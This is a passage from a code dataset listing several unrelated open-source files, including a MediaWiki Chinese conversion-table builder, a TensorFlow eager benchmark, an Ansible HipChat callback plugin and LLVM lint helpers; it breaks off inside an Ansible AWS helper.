repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
yuanzhao/gpdb | src/test/tinc/tincrepo/mpp/lib/mpp_tl.py | 12 | 1154 | """
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.models.mpp_tc import _MPPMetaClassType
class MPPTestLib(object):
# MPPTestLib class is of type MPPMetaClassType
# MPPMetaClassType will take of reconfiguring the bases of all the derived classes that have product-specific hidden libraries
__metaclass__ = _MPPMetaClassType
def __init__(self):
self.make_me_product_agnostic()
super(MPPTestLib, self).__init__()
class __gpdbMPPTestLib__(MPPTestLib):
pass
class __hawqMPPTestLib__(MPPTestLib):
pass
| apache-2.0 |
ryanolson/couchdb-python | perftest.py | 7 | 1440 | """
Simple peformance tests.
"""
import sys
import time
import couchdb
def main():
print 'sys.version : %r' % (sys.version,)
print 'sys.platform : %r' % (sys.platform,)
tests = [create_doc, create_bulk_docs]
if len(sys.argv) > 1:
tests = [test for test in tests if test.__name__ in sys.argv[1:]]
server = couchdb.Server()
for test in tests:
_run(server, test)
def _run(server, func):
"""Run a test in a clean db and log its execution time."""
sys.stdout.write("* [%s] %s ... " % (func.__name__, func.__doc__.strip()))
sys.stdout.flush()
db_name = 'couchdb-python/perftest'
db = server.create(db_name)
try:
try:
start = time.time()
func(db)
stop = time.time()
sys.stdout.write("%0.2fs\n" % (stop - start,))
sys.stdout.flush()
except Exception, e:
sys.stdout.write("FAILED - %r\n" % (unicode(e),))
sys.stdout.flush()
finally:
server.delete(db_name)
def create_doc(db):
"""Create lots of docs, one at a time"""
for i in range(1000):
db.save({'_id': unicode(i)})
def create_bulk_docs(db):
"""Create lots of docs, lots at a time"""
batch_size = 100
num_batches = 1000
for i in range(num_batches):
db.update([{'_id': unicode((i * batch_size) + j)} for j in range(batch_size)])
if __name__ == '__main__':
main()
| bsd-3-clause |
kunalgrover05/Mediawiki-pagelang | maintenance/language/zhtable/Makefile.py | 63 | 14541 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author Philip
import tarfile as tf
import zipfile as zf
import os, re, shutil, sys, platform
pyversion = platform.python_version()
islinux = platform.system().lower() == 'linux'
if pyversion[:3] in ['2.6', '2.7']:
import urllib as urllib_request
import codecs
open = codecs.open
_unichr = unichr
if sys.maxunicode < 0x10000:
def unichr(i):
if i < 0x10000:
return _unichr(i)
else:
return _unichr( 0xD7C0 + ( i>>10 ) ) + _unichr( 0xDC00 + ( i & 0x3FF ) )
elif pyversion[:2] == '3.':
import urllib.request as urllib_request
unichr = chr
def unichr2( *args ):
return [unichr( int( i.split('<')[0][2:], 16 ) ) for i in args]
def unichr3( *args ):
return [unichr( int( i[2:7], 16 ) ) for i in args if i[2:7]]
# DEFINE
UNIHAN_VER = '6.3.0'
SF_MIRROR = 'dfn'
SCIM_TABLES_VER = '0.5.13'
SCIM_PINYIN_VER = '0.5.92'
LIBTABE_VER = '0.2.3'
# END OF DEFINE
def download( url, dest ):
if os.path.isfile( dest ):
print( 'File %s is up to date.' % dest )
return
global islinux
if islinux:
# we use wget instead urlretrieve under Linux,
# because wget could display details like download progress
os.system( 'wget %s -O %s' % ( url, dest ) )
else:
print( 'Downloading from [%s] ...' % url )
urllib_request.urlretrieve( url, dest )
print( 'Download complete.\n' )
return
def uncompress( fp, member, encoding = 'U8' ):
name = member.rsplit( '/', 1 )[-1]
print( 'Extracting %s ...' % name )
fp.extract( member )
shutil.move( member, name )
if '/' in member:
shutil.rmtree( member.split( '/', 1 )[0] )
if pyversion[:1] in ['2']:
fc = open( name, 'rb', encoding, 'ignore' )
else:
fc = open( name, 'r', encoding = encoding, errors = 'ignore' )
return fc
unzip = lambda path, member, encoding = 'U8': \
uncompress( zf.ZipFile( path ), member, encoding )
untargz = lambda path, member, encoding = 'U8': \
uncompress( tf.open( path, 'r:gz' ), member, encoding )
def parserCore( fp, pos, beginmark = None, endmark = None ):
if beginmark and endmark:
start = False
else: start = True
mlist = set()
for line in fp:
if beginmark and line.startswith( beginmark ):
start = True
continue
elif endmark and line.startswith( endmark ):
break
if start and not line.startswith( '#' ):
elems = line.split()
if len( elems ) < 2:
continue
elif len( elems[0] ) > 1 and \
len( elems[pos] ) > 1: # words only
mlist.add( elems[pos] )
return mlist
def tablesParser( path, name ):
""" Read file from scim-tables and parse it. """
global SCIM_TABLES_VER
src = 'scim-tables-%s/tables/zh/%s' % ( SCIM_TABLES_VER, name )
fp = untargz( path, src, 'U8' )
return parserCore( fp, 1, 'BEGIN_TABLE', 'END_TABLE' )
ezbigParser = lambda path: tablesParser( path, 'EZ-Big.txt.in' )
wubiParser = lambda path: tablesParser( path, 'Wubi.txt.in' )
zrmParser = lambda path: tablesParser( path, 'Ziranma.txt.in' )
def phraseParser( path ):
""" Read phrase_lib.txt and parse it. """
global SCIM_PINYIN_VER
src = 'scim-pinyin-%s/data/phrase_lib.txt' % SCIM_PINYIN_VER
dst = 'phrase_lib.txt'
fp = untargz( path, src, 'U8' )
return parserCore( fp, 0 )
def tsiParser( path ):
""" Read tsi.src and parse it. """
src = 'libtabe/tsi-src/tsi.src'
dst = 'tsi.src'
fp = untargz( path, src, 'big5hkscs' )
return parserCore( fp, 0 )
def unihanParser( path ):
""" Read Unihan_Variants.txt and parse it. """
fp = unzip( path, 'Unihan_Variants.txt', 'U8' )
t2s = dict()
s2t = dict()
for line in fp:
if line.startswith( '#' ):
continue
else:
elems = line.split()
if len( elems ) < 3:
continue
type = elems.pop( 1 )
elems = unichr2( *elems )
if type == 'kTraditionalVariant':
s2t[elems[0]] = elems[1:]
elif type == 'kSimplifiedVariant':
t2s[elems[0]] = elems[1:]
fp.close()
return ( t2s, s2t )
def applyExcludes( mlist, path ):
""" Apply exclude rules from path to mlist. """
if pyversion[:1] in ['2']:
excludes = open( path, 'rb', 'U8' ).read().split()
else:
excludes = open( path, 'r', encoding = 'U8' ).read().split()
excludes = [word.split( '#' )[0].strip() for word in excludes]
excludes = '|'.join( excludes )
excptn = re.compile( '.*(?:%s).*' % excludes )
diff = [mword for mword in mlist if excptn.search( mword )]
mlist.difference_update( diff )
return mlist
def charManualTable( path ):
fp = open( path, 'r', encoding = 'U8' )
ret = {}
for line in fp:
elems = line.split( '#' )[0].split( '|' )
elems = unichr3( *elems )
if len( elems ) > 1:
ret[elems[0]] = elems[1:]
return ret
def toManyRules( src_table ):
tomany = set()
if pyversion[:1] in ['2']:
for ( f, t ) in src_table.iteritems():
for i in range( 1, len( t ) ):
tomany.add( t[i] )
else:
for ( f, t ) in src_table.items():
for i in range( 1, len( t ) ):
tomany.add( t[i] )
return tomany
def removeRules( path, table ):
fp = open( path, 'r', encoding = 'U8' )
texc = list()
for line in fp:
elems = line.split( '=>' )
f = t = elems[0].strip()
if len( elems ) == 2:
t = elems[1].strip()
f = f.strip('"').strip("'")
t = t.strip('"').strip("'")
if f:
try:
table.pop( f )
except:
pass
if t:
texc.append( t )
texcptn = re.compile( '^(?:%s)$' % '|'.join( texc ) )
if pyversion[:1] in ['2']:
for (tmp_f, tmp_t) in table.copy().iteritems():
if texcptn.match( tmp_t ):
table.pop( tmp_f )
else:
for (tmp_f, tmp_t) in table.copy().items():
if texcptn.match( tmp_t ):
table.pop( tmp_f )
return table
def customRules( path ):
fp = open( path, 'r', encoding = 'U8' )
ret = dict()
for line in fp:
elems = line.split( '#' )[0].split()
if len( elems ) > 1:
ret[elems[0]] = elems[1]
return ret
def dictToSortedList( src_table, pos ):
return sorted( src_table.items(), key = lambda m: m[pos] )
def translate( text, conv_table ):
i = 0
while i < len( text ):
for j in range( len( text ) - i, 0, -1 ):
f = text[i:][:j]
t = conv_table.get( f )
if t:
text = text[:i] + t + text[i:][j:]
i += len(t) - 1
break
i += 1
return text
def manualWordsTable( path, conv_table, reconv_table ):
fp = open( path, 'r', encoding = 'U8' )
reconv_table = {}
wordlist = [line.split( '#' )[0].strip() for line in fp]
wordlist = list( set( wordlist ) )
wordlist.sort( key = len, reverse = True )
while wordlist:
word = wordlist.pop()
new_word = translate( word, conv_table )
rcv_word = translate( word, reconv_table )
if word != rcv_word:
reconv_table[word] = word
reconv_table[new_word] = word
return reconv_table
def defaultWordsTable( src_wordlist, src_tomany, char_conv_table, char_reconv_table ):
wordlist = list( src_wordlist )
wordlist.sort( key = len, reverse = True )
word_conv_table = {}
word_reconv_table = {}
conv_table = char_conv_table.copy()
reconv_table = char_reconv_table.copy()
tomanyptn = re.compile( '(?:%s)' % '|'.join( src_tomany ) )
while wordlist:
conv_table.update( word_conv_table )
reconv_table.update( word_reconv_table )
word = wordlist.pop()
new_word_len = word_len = len( word )
while new_word_len == word_len:
add = False
test_word = translate( word, reconv_table )
new_word = translate( word, conv_table )
if not reconv_table.get( new_word ) \
and ( test_word != word \
or ( tomanyptn.search( word ) \
and word != translate( new_word, reconv_table ) ) ):
word_conv_table[word] = new_word
word_reconv_table[new_word] = word
try:
word = wordlist.pop()
except IndexError:
break
new_word_len = len(word)
return word_reconv_table
def PHPArray( table ):
lines = ['\'%s\' => \'%s\',' % (f, t) for (f, t) in table if f and t]
return '\n'.join(lines)
def main():
#Get Unihan.zip:
url = 'http://www.unicode.org/Public/%s/ucd/Unihan.zip' % UNIHAN_VER
han_dest = 'Unihan.zip'
download( url, han_dest )
# Get scim-tables-$(SCIM_TABLES_VER).tar.gz:
url = 'http://%s.dl.sourceforge.net/sourceforge/scim/scim-tables-%s.tar.gz' % ( SF_MIRROR, SCIM_TABLES_VER )
tbe_dest = 'scim-tables-%s.tar.gz' % SCIM_TABLES_VER
download( url, tbe_dest )
# Get scim-pinyin-$(SCIM_PINYIN_VER).tar.gz:
url = 'http://%s.dl.sourceforge.net/sourceforge/scim/scim-pinyin-%s.tar.gz' % ( SF_MIRROR, SCIM_PINYIN_VER )
pyn_dest = 'scim-pinyin-%s.tar.gz' % SCIM_PINYIN_VER
download( url, pyn_dest )
# Get libtabe-$(LIBTABE_VER).tgz:
url = 'http://%s.dl.sourceforge.net/sourceforge/libtabe/libtabe-%s.tgz' % ( SF_MIRROR, LIBTABE_VER )
lbt_dest = 'libtabe-%s.tgz' % LIBTABE_VER
download( url, lbt_dest )
# Unihan.txt
( t2s_1tomany, s2t_1tomany ) = unihanParser( han_dest )
t2s_1tomany.update( charManualTable( 'trad2simp.manual' ) )
s2t_1tomany.update( charManualTable( 'simp2trad.manual' ) )
if pyversion[:1] in ['2']:
t2s_1to1 = dict( [( f, t[0] ) for ( f, t ) in t2s_1tomany.iteritems()] )
s2t_1to1 = dict( [( f, t[0] ) for ( f, t ) in s2t_1tomany.iteritems()] )
else:
t2s_1to1 = dict( [( f, t[0] ) for ( f, t ) in t2s_1tomany.items()] )
s2t_1to1 = dict( [( f, t[0] ) for ( f, t ) in s2t_1tomany.items()] )
s_tomany = toManyRules( t2s_1tomany )
t_tomany = toManyRules( s2t_1tomany )
# noconvert rules
t2s_1to1 = removeRules( 'trad2simp_noconvert.manual', t2s_1to1 )
s2t_1to1 = removeRules( 'simp2trad_noconvert.manual', s2t_1to1 )
# the supper set for word to word conversion
t2s_1to1_supp = t2s_1to1.copy()
s2t_1to1_supp = s2t_1to1.copy()
t2s_1to1_supp.update( customRules( 'trad2simp_supp_set.manual' ) )
s2t_1to1_supp.update( customRules( 'simp2trad_supp_set.manual' ) )
# word to word manual rules
t2s_word2word_manual = manualWordsTable( 'simpphrases.manual', s2t_1to1_supp, t2s_1to1_supp )
t2s_word2word_manual.update( customRules( 'toSimp.manual' ) )
s2t_word2word_manual = manualWordsTable( 'tradphrases.manual', t2s_1to1_supp, s2t_1to1_supp )
s2t_word2word_manual.update( customRules( 'toTrad.manual' ) )
# word to word rules from input methods
t_wordlist = set()
s_wordlist = set()
t_wordlist.update( ezbigParser( tbe_dest ),
tsiParser( lbt_dest ) )
s_wordlist.update( wubiParser( tbe_dest ),
zrmParser( tbe_dest ),
phraseParser( pyn_dest ) )
# exclude
s_wordlist = applyExcludes( s_wordlist, 'simpphrases_exclude.manual' )
t_wordlist = applyExcludes( t_wordlist, 'tradphrases_exclude.manual' )
s2t_supp = s2t_1to1_supp.copy()
s2t_supp.update( s2t_word2word_manual )
t2s_supp = t2s_1to1_supp.copy()
t2s_supp.update( t2s_word2word_manual )
# parse list to dict
t2s_word2word = defaultWordsTable( s_wordlist, s_tomany, s2t_1to1_supp, t2s_supp )
t2s_word2word.update( t2s_word2word_manual )
s2t_word2word = defaultWordsTable( t_wordlist, t_tomany, t2s_1to1_supp, s2t_supp )
s2t_word2word.update( s2t_word2word_manual )
# Final tables
# sorted list toHans
if pyversion[:1] in ['2']:
t2s_1to1 = dict( [( f, t ) for ( f, t ) in t2s_1to1.iteritems() if f != t] )
else:
t2s_1to1 = dict( [( f, t ) for ( f, t ) in t2s_1to1.items() if f != t] )
toHans = dictToSortedList( t2s_1to1, 0 ) + dictToSortedList( t2s_word2word, 1 )
# sorted list toHant
if pyversion[:1] in ['2']:
s2t_1to1 = dict( [( f, t ) for ( f, t ) in s2t_1to1.iteritems() if f != t] )
else:
s2t_1to1 = dict( [( f, t ) for ( f, t ) in s2t_1to1.items() if f != t] )
toHant = dictToSortedList( s2t_1to1, 0 ) + dictToSortedList( s2t_word2word, 1 )
# sorted list toCN
toCN = dictToSortedList( customRules( 'toCN.manual' ), 1 )
# sorted list toHK
toHK = dictToSortedList( customRules( 'toHK.manual' ), 1 )
# sorted list toSG
toSG = dictToSortedList( customRules( 'toSG.manual' ), 1 )
# sorted list toTW
toTW = dictToSortedList( customRules( 'toTW.manual' ), 1 )
# Get PHP Array
php = '''<?php
/**
* Simplified / Traditional Chinese conversion tables
*
* Automatically generated using code and data in maintenance/language/zhtable/
* Do not modify directly!
*
* @file
*/
$zh2Hant = array(\n'''
php += PHPArray( toHant ) \
+ '\n);\n\n$zh2Hans = array(\n' \
+ PHPArray( toHans ) \
+ '\n);\n\n$zh2TW = array(\n' \
+ PHPArray( toTW ) \
+ '\n);\n\n$zh2HK = array(\n' \
+ PHPArray( toHK ) \
+ '\n);\n\n$zh2CN = array(\n' \
+ PHPArray( toCN ) \
+ '\n);\n\n$zh2SG = array(\n' \
+ PHPArray( toSG ) \
+ '\n);\n'
if pyversion[:1] in ['2']:
f = open( os.path.join( '..', '..', '..', 'includes', 'ZhConversion.php' ), 'wb', encoding = 'utf8' )
else:
f = open( os.path.join( '..', '..', '..', 'includes', 'ZhConversion.php' ), 'w', buffering = 4096, encoding = 'utf8' )
print ('Writing ZhConversion.php ... ')
f.write( php )
f.close()
# Remove temporary files
print ('Deleting temporary files ... ')
os.remove('EZ-Big.txt.in')
os.remove('phrase_lib.txt')
os.remove('tsi.src')
os.remove('Unihan_Variants.txt')
os.remove('Wubi.txt.in')
os.remove('Ziranma.txt.in')
if __name__ == '__main__':
main()
| gpl-2.0 |
with-git/tensorflow | tensorflow/python/eager/benchmarks_test.py | 5 | 4874 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Benchmarks for low-level eager execution primitives.
Packaged as a test to ensure that this code is exercised by continuous
integration tests. To get numbers:
bazel build -c opt :benchmarks_test &&
./bazel-bin/tensorflow/python/eager/benchmarks_test --iters=0
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import contextlib
import sys
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import backprop # pylint: disable=unused-import
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import tensor
from tensorflow.python.eager import test
from tensorflow.python.framework import test_util
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
FLAGS = None
@contextlib.contextmanager
def timer(label, iters=30000):
start = time.time()
yield xrange(iters)
end = time.time()
t = (end - start) * 1e6 / iters
print("%-40s took %.2fus (%d iterations)" % (label, t, iters))
def benchmark_create_tensor(n):
"""Benchmark overheads of creating a Tensor object."""
def label(s):
return "{:20s}".format(s)
with timer(label("np.array([[3]])"), iters=n) as iters:
for _ in iters:
np.array([[3]])
with timer(label("Tensor([[3]])"), iters=n) as iters:
for _ in iters:
tensor.Tensor([[3]])
def benchmark_matmul(shape, n, use_gpu=False):
"""Benchmark for matrix multiplication using tf.matmul."""
transpose_b = (shape[0] != shape[1])
m = random_ops.random_uniform(shape)
if use_gpu:
m = m.as_gpu_tensor()
# Warm up the GPU - the very first kernel invocation
# seems to require a bunch of setup.
math_ops.matmul(m, m, transpose_b=transpose_b)
def label(s):
return "MatMul {}: {:30s}".format(shape, s)
if not use_gpu:
a = m.as_cpu_tensor().numpy()
b = a.T if transpose_b else a
with timer(label("np.dot"), iters=n) as iters:
for _ in iters:
np.dot(a, b)
with timer(label("tf.matmul"), iters=n) as iters:
for _ in iters:
math_ops.matmul(m, m, transpose_b=transpose_b)
with timer(label("gen_math_ops.mat_mul"), iters=n) as iters:
for _ in iters:
gen_math_ops._mat_mul(m, m, transpose_b=transpose_b)
# pylint: disable=protected-access
input_handles = [m._handle, m._handle]
ctx_handle = context.context()._handle
# pylint: enable=protected-access
attrs = ("transpose_a", False, "transpose_b", transpose_b, "T",
m.dtype.as_datatype_enum)
with timer(label("TFE_Py_Execute"), iters=n) as iters:
for _ in iters:
pywrap_tensorflow.TFE_DeleteTensorHandle(
pywrap_tensorflow.TFE_Py_Execute(ctx_handle, None, "MatMul",
input_handles, attrs, 1)[0])
f = function.defun(math_ops.matmul)
with timer(label("defun(tf.matmul)"), iters=n) as iters:
for _ in iters:
f(m, m, transpose_b=transpose_b)
class BenchmarksTest(test_util.TensorFlowTestCase):
def testBenchmarks(self):
# This isn't actually a test, but benchmarks packaged as a test
# so that continuous integration runs catch any breakages.
print(context.context())
benchmark_create_tensor(FLAGS.iters or 30000)
benchmark_matmul([2, 2], FLAGS.iters or 30000)
benchmark_matmul([100, 28 * 28], FLAGS.iters or 1000)
if context.context().num_gpus() > 0:
print("---- RUNNING ON GPU NOW ----")
benchmark_matmul([2, 2], FLAGS.iters or 30000, use_gpu=True)
benchmark_matmul([100, 28 * 28], FLAGS.iters or 1000, use_gpu=True)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Default iterations to 1 to keep continuos integration test times low.
parser.add_argument(
"--iters",
type=int,
default=1,
help="Number of iterators for each test. None or 0 for auto-selection")
FLAGS, unparsed = parser.parse_known_args()
sys.argv = [sys.argv[0]] + unparsed
test.main()
| apache-2.0 |
rest-of/the-deck | lambda/lib/python2.7/site-packages/pip/_vendor/progress/counter.py | 510 | 1502 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 Giorgos Verigakis <[email protected]>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from . import Infinite, Progress
from .helpers import WriteMixin
class Counter(WriteMixin, Infinite):
message = ''
hide_cursor = True
def update(self):
self.write(str(self.index))
class Countdown(WriteMixin, Progress):
hide_cursor = True
def update(self):
self.write(str(self.remaining))
class Stack(WriteMixin, Progress):
phases = (u' ', u'β', u'β', u'β', u'β', u'β
', u'β', u'β', u'β')
hide_cursor = True
def update(self):
nphases = len(self.phases)
i = min(nphases - 1, int(self.progress * nphases))
self.write(self.phases[i])
class Pie(Stack):
phases = (u'β', u'β', u'β', u'β', u'β')
| mit |
hzy001/ansible | lib/ansible/plugins/callback/hipchat.py | 101 | 5867 | # (C) 2014, Matt Martz <[email protected]>
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import os
import urllib
import urllib2
try:
import prettytable
HAS_PRETTYTABLE = True
except ImportError:
HAS_PRETTYTABLE = False
from ansible.plugins.callback import CallbackBase
class CallbackModule(CallbackBase):
"""This is an example ansible callback plugin that sends status
updates to a HipChat channel during playbook execution.
This plugin makes use of the following environment variables:
HIPCHAT_TOKEN (required): HipChat API token
HIPCHAT_ROOM (optional): HipChat room to post in. Default: ansible
HIPCHAT_FROM (optional): Name to post as. Default: ansible
HIPCHAT_NOTIFY (optional): Add notify flag to important messages ("true" or "false"). Default: true
Requires:
prettytable
"""
CALLBACK_VERSION = 2.0
CALLBACK_VERSION = 2.0
CALLBACK_NAME = 'hipchat'
def __init__(self, display):
super(CallbackModule, self).__init__(display)
if not HAS_PRETTYTABLE:
self.disabled = True
self.display.warning('The `prettytable` python module is not installed. '
'Disabling the HipChat callback plugin.')
self.msg_uri = 'https://api.hipchat.com/v1/rooms/message'
self.token = os.getenv('HIPCHAT_TOKEN')
self.room = os.getenv('HIPCHAT_ROOM', 'ansible')
self.from_name = os.getenv('HIPCHAT_FROM', 'ansible')
self.allow_notify = (os.getenv('HIPCHAT_NOTIFY') != 'false')
if self.token is None:
self.disabled = True
self.display.warning('HipChat token could not be loaded. The HipChat '
'token can be provided using the `HIPCHAT_TOKEN` '
'environment variable.')
self.printed_playbook = False
self.playbook_name = None
def send_msg(self, msg, msg_format='text', color='yellow', notify=False):
"""Method for sending a message to HipChat"""
params = {}
params['room_id'] = self.room
params['from'] = self.from_name[:15] # max length is 15
params['message'] = msg
params['message_format'] = msg_format
params['color'] = color
params['notify'] = int(self.allow_notify and notify)
url = ('%s?auth_token=%s' % (self.msg_uri, self.token))
try:
response = urllib2.urlopen(url, urllib.urlencode(params))
return response.read()
except:
self.display.warning('Could not submit message to hipchat')
def playbook_on_play_start(self, name):
"""Display Playbook and play start messages"""
# This block sends information about a playbook when it starts
# The playbook object is not immediately available at
# playbook_on_start so we grab it via the play
#
# Displays info about playbook being started by a person on an
# inventory, as well as Tags, Skip Tags and Limits
if not self.printed_playbook:
self.playbook_name, _ = os.path.splitext(
os.path.basename(self.play.playbook.filename))
host_list = self.play.playbook.inventory.host_list
inventory = os.path.basename(os.path.realpath(host_list))
self.send_msg("%s: Playbook initiated by %s against %s" %
(self.playbook_name,
self.play.playbook.remote_user,
inventory), notify=True)
self.printed_playbook = True
subset = self.play.playbook.inventory._subset
skip_tags = self.play.playbook.skip_tags
self.send_msg("%s:\nTags: %s\nSkip Tags: %s\nLimit: %s" %
(self.playbook_name,
', '.join(self.play.playbook.only_tags),
', '.join(skip_tags) if skip_tags else None,
', '.join(subset) if subset else subset))
# This is where we actually say we are starting a play
self.send_msg("%s: Starting play: %s" %
(self.playbook_name, name))
def playbook_on_stats(self, stats):
"""Display info about playbook statistics"""
hosts = sorted(stats.processed.keys())
t = prettytable.PrettyTable(['Host', 'Ok', 'Changed', 'Unreachable',
'Failures'])
failures = False
unreachable = False
for h in hosts:
s = stats.summarize(h)
if s['failures'] > 0:
failures = True
if s['unreachable'] > 0:
unreachable = True
t.add_row([h] + [s[k] for k in ['ok', 'changed', 'unreachable',
'failures']])
self.send_msg("%s: Playbook complete" % self.playbook_name,
notify=True)
if failures or unreachable:
color = 'red'
self.send_msg("%s: Failures detected" % self.playbook_name,
color=color, notify=True)
else:
color = 'green'
self.send_msg("/code %s:\n%s" % (self.playbook_name, t), color=color)
| gpl-3.0 |
tianyang-li/de-novo-rna-seq-quant-1 | util/trinity_0.py | 1 | 3040 | #!/usr/bin/env python
# Copyright (C) 2012 Tianyang Li
# [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
"""
handles Trinity's output
"""
from __future__ import division
from collections import defaultdict
import re
from Bio import SeqIO
from fasta_0 import FastaSeq
class TrinityContig(FastaSeq):
__slots__ = ['nodes']
def __init__(self, rec_id, seq, nodes):
"""
nodes
a list of
(node, low, high)
describing nodes in splice graph
"""
super(TrinityContig, self).__init__(rec_id, seq)
self.nodes = nodes
def find_start(self, start):
"""
find the node of a psl.tStart is in
it is assumed that _start_ can always
find a node to fit in
"""
l = 0
h = len(self.nodes) - 1
x = int((l + h) / 2)
while (start < self.nodes[x][1]
or start >= self.nodes[x][2]):
if start < self.nodes[x][1]:
h = x - 1
else:
l = x + 1
x = int((l + h) / 2)
return x
def find_end(self, end):
"""
find the node a psl.tEnd is in
it is assumed that _end_ can always find
a node to fit in
"""
l = 0
h = len(self.nodes) - 1
x = int((l + h) / 2)
while (end <= self.nodes[x][1]
or end > self.nodes[x][2]):
if end <= self.nodes[x][1]:
h = x - 1
else:
l = x + 1
x = int((l + h) / 2)
return x
path_re = re.compile(r'path=\[(.*)\]')
node_re = re.compile(r'(\w*):(\d*)-(\d*)')
def convert_node_re(n):
return (n[0], int(n[1]), int(n[2]) + 1)
def get_contig_nodes(rec_decription):
global path_re, node_re
nodes = path_re.search(rec_decription).group(1).split(" ")
return map(lambda n: convert_node_re(node_re.search(n).groups()), nodes)
def get_contig_dict(trinity_out_file):
"""
return a defaultdict(dict)
where
contig_dict[graph][contig]
is _contig_ from _graph_
"""
contig_dict = defaultdict(dict)
for rec in SeqIO.parse(trinity_out_file, 'fasta'):
rec_id = rec.id
contig_dict[rec_id.split("_")[0]][rec_id] = TrinityContig(rec_id, str(rec.seq), get_contig_nodes(rec.description))
return contig_dict
| gpl-3.0 |
sawenzel/root | interpreter/llvm/src/utils/lint/common_lint.py | 147 | 2589 | #!/usr/bin/python
#
# Common lint functions applicable to multiple types of files.
import re
def VerifyLineLength(filename, lines, max_length):
"""Checks to make sure the file has no lines with lines exceeding the length
limit.
Args:
filename: the file under consideration as string
lines: contents of the file as string array
max_length: maximum acceptable line length as number
Returns:
A list of tuples with format [(filename, line number, msg), ...] with any
violations found.
"""
lint = []
line_num = 1
for line in lines:
length = len(line.rstrip('\n'))
if length > max_length:
lint.append((filename, line_num,
'Line exceeds %d chars (%d)' % (max_length, length)))
line_num += 1
return lint
def VerifyTabs(filename, lines):
"""Checks to make sure the file has no tab characters.
Args:
filename: the file under consideration as string
lines: contents of the file as string array
Returns:
A list of tuples with format [(line_number, msg), ...] with any violations
found.
"""
lint = []
tab_re = re.compile(r'\t')
line_num = 1
for line in lines:
if tab_re.match(line.rstrip('\n')):
lint.append((filename, line_num, 'Tab found instead of whitespace'))
line_num += 1
return lint
def VerifyTrailingWhitespace(filename, lines):
"""Checks to make sure the file has no lines with trailing whitespace.
Args:
filename: the file under consideration as string
lines: contents of the file as string array
Returns:
A list of tuples with format [(filename, line number, msg), ...] with any
violations found.
"""
lint = []
trailing_whitespace_re = re.compile(r'\s+$')
line_num = 1
for line in lines:
if trailing_whitespace_re.match(line.rstrip('\n')):
lint.append((filename, line_num, 'Trailing whitespace'))
line_num += 1
return lint
class BaseLint:
def RunOnFile(filename, lines):
raise Exception('RunOnFile() unimplemented')
def RunLintOverAllFiles(linter, filenames):
"""Runs linter over the contents of all files.
Args:
lint: subclass of BaseLint, implementing RunOnFile()
filenames: list of all files whose contents will be linted
Returns:
A list of tuples with format [(filename, line number, msg), ...] with any
violations found.
"""
lint = []
for filename in filenames:
file = open(filename, 'r')
if not file:
print 'Cound not open %s' % filename
continue
lines = file.readlines()
lint.extend(linter.RunOnFile(filename, lines))
return lint
| lgpl-2.1 |
toshywoshy/ansible | lib/ansible/module_utils/aws/iam.py | 60 | 2118 | # Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import traceback
try:
from botocore.exceptions import ClientError, NoCredentialsError
except ImportError:
pass # caught by HAS_BOTO3
from ansible.module_utils._text import to_native
def get_aws_account_id(module):
""" Given AnsibleAWSModule instance, get the active AWS account ID
get_account_id tries too find out the account that we are working
on. It's not guaranteed that this will be easy so we try in
several different ways. Giving either IAM or STS privilages to
